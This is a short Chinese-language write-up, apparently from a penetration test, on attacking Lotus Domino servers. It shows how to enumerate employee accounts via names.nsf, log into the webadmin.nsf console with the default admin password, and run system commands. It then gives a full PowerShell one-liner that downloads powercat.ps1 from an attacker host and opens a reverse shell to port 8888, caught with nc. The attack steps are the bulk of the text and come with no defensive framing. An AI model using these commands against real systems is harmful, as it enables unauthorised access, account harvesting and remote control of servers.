Lotus Domino简介
应用程序使用Lotus Domino开发。Lotus Domino是一款基于WEB合作的应用程序架构,集电子邮件、文档数据库、快速应用开发技术以及Web技术为一体的电子邮件与群集平台,运行在Linux/Unix和Microsoft Windows操作系统平台下。
可通过webadmin.nsf访问控制台进行接口管理。Lotus Domino控制台提供了各种命令用于管理服务器。只要获取管理员权限后,就可以执行各种命令,造成命令执行。
Lotus Domino指纹信息:
漏洞利用
可以访问http://10.168.2.4/names.nsf/$users 获取员工账号信息
访问控制台http://10.168.2.4/webadmin.nsf 使用管理员账号admin,默认密码password,登陆系统
选择"Server"-"Status"-"Quick console",执行命令
命令格式:
load cmd /c ping c4vm7l.dnslog.cn
使用powershell 执行powercat反弹shell:
执行命令,使用powershell远程下载执行powercat.ps1,反弹shell到本机10.82.108.62的8888端口
load cmd /c powershell IEX (New-Object
System.Net.Webclient).DownloadString('http://10.82.108.62/powercat.ps1'); powercat -c
10.82.108.62 -p 8888 -e cmd
使用nc监听本地的8888端口,接收shell会话
